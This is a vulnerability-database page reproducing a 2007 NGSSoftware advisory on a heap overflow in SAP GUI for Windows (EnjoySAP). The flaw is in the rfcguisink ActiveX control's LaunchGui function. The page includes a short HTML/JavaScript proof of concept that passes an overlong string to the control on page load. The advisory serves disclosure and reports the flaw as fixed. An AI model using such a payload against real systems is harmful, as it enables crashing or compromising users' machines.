Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

NGS-enjoysap-heap.txt

🗓️ 07 Jul 2007 00:00:00Reported by Mark LitchfieldType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 29 Views

EnjoySAP GUI for Windows, Heap Overflow, ActiveX controls vulnerability, high risk, fixe

Code
`=======  
Summary  
=======  
Name: EnjoySAP, SAP GUI for Windows - Heap Overflow  
Release Date: 5 July 2007  
Reference: NGS00482  
Discover: Mark Litchfield <[email protected]>  
Vendor: SAP  
Vendor Reference: SECRES-290  
Systems Affected: All ASCII Versions  
Risk: High  
Status: Fixed  
  
========  
TimeLine  
========  
Discovered: 4 January 2007  
Released: 19 January 2007  
Approved: 29 January 2007  
Reported: 12 January 2007  
Fixed: 27 March 2007  
Published:   
  
===========  
Description  
===========  
EnjoySAP, also know as Enjoy is the most popular SAP GUI used today. The  
latest version can be obtained from ftp://ftp.sap.com/pub/sapgui/win/  
  
When installing EnjoySAP, in appreciation of its vast size for being a  
client (around 500MB), there are an astounding 1102 ActiveX controls  
installed.  
  
A relatively brief examinaton of these controls, found a large number of  
instances that would terminate EnjoySAP process, there were a number that  
could create files on the file system (there unfortunately exists no  
ability to inject content into these created files) and a number of  
bufferoverruns.  
  
=================  
Technical Details  
=================  
Control - rfcguisink.rfcguisink.1  
  
Function - LaunchGui  
  
POC:  
  
<HTML>  
<HEAD>  
<META http-equiv=Content-Type content="text/html; charset=windows-1252">  
<SCRIPT type=text/javascript>  
  
function init()  
{  
var foo = "";   
  
for(var icount = 0; icount < 1800; icount++)   
{   
foo = foo + "x";  
}  
var ngssoftware;  
ngssoftware = new ActiveXObject("rfcguisink.rfcguisink.1");  
  
ngssoftware["LaunchGui"](foo, 1, 1);  
}  
//-->  
</SCRIPT>  
  
</HEAD>  
<BODY bgColor=#ffffff onload=init()>  
</BODY></HTML>  
  
===============  
Fix Information  
===============  
Please ensure you are running the latest version  
  
NGSSoftware Insight Security Research  
http://www.ngssoftware.com/  
http://www.databasesecurity.com/  
http://www.nextgenss.com/  
+44(0)208 401 0070   
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
07 Jul 2007 00:00Current
7.4High risk
Vulners AI Score7.4
sapguiwindowsheap overflowactivex controlsvulnerabilityhigh riskfixedngs00482ascii versions
29